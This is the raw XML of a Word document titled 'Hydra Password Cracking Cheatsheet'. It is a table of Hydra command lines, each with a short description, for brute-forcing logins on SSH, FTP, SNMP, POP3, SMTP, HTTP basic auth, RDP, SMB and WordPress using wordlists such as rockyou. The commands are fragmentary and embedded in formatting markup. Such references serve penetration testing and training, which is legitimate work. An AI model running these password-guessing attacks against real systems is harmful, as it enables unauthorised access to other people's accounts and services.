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3470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9"/>
        <w:gridCol w:w="3641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24292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description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-P password-file.txt -v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snmp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brute force against SNMP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-t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV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ftp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FTP known user and rockyou password list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-v -V -u -L users.txt -P passwords.txt -t 1 -u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ssh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SSH using list of users and passwords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-v -V -u -L users.txt -p "" -t 1 -u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ssh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SSH using a known password and a username list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-s 22 ssh -l -P big_wordlist.txt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SSH Against Known username on port 22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-l USERNAME -P /usr/share/wordlistsnmap.lst -f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pop3 -V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POP3 Brute Force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-P /usr/share/wordlistsnmap.lst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smtp -V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SMTP Brute Force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-L ./webapp.txt -P ./webapp.txt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http-get /admin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attack http get 401 login with a dictionary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hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
                <w:color w:val="24292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US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-t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$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attack Windows Remote Desktop with rockyou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-t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt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smb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brute force SMB user with rockyou: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-l admin -P ./passwordlist.txt $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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w: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 xml:space="preserve"> -V http-form-post '/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;wp-submit=Log In&amp;testcookie=1:S=Location'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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4292E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Hydra brute force a Wordpress admin login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:sectPr>
      <w:headerReference r:id="rId5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32"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t>Hydra Password Cracking Cheatsheet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DC"/>
    <w:rsid w:val="002F49DC"/>
    <w:rsid w:val="00EC5C5C"/>
    <w:rsid w:val="0BD43375"/>
    <w:rsid w:val="281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180</Words>
  <Characters>1030</Characters>
  <Lines>8</Lines>
  <Paragraphs>2</Paragraphs>
  <TotalTime>200</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1208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2018-10-22T17:25:00Z</dcterms:created>
  <dc:creator>Austin Scott</dc:creator>
  <cp:lastModifiedBy>Mohammed Hawary</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-22T13:59:03Z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81B5464066F44A3181EB73A0FAFF3CED</vt:lpwstr>
  </property>
</Properties>
</file>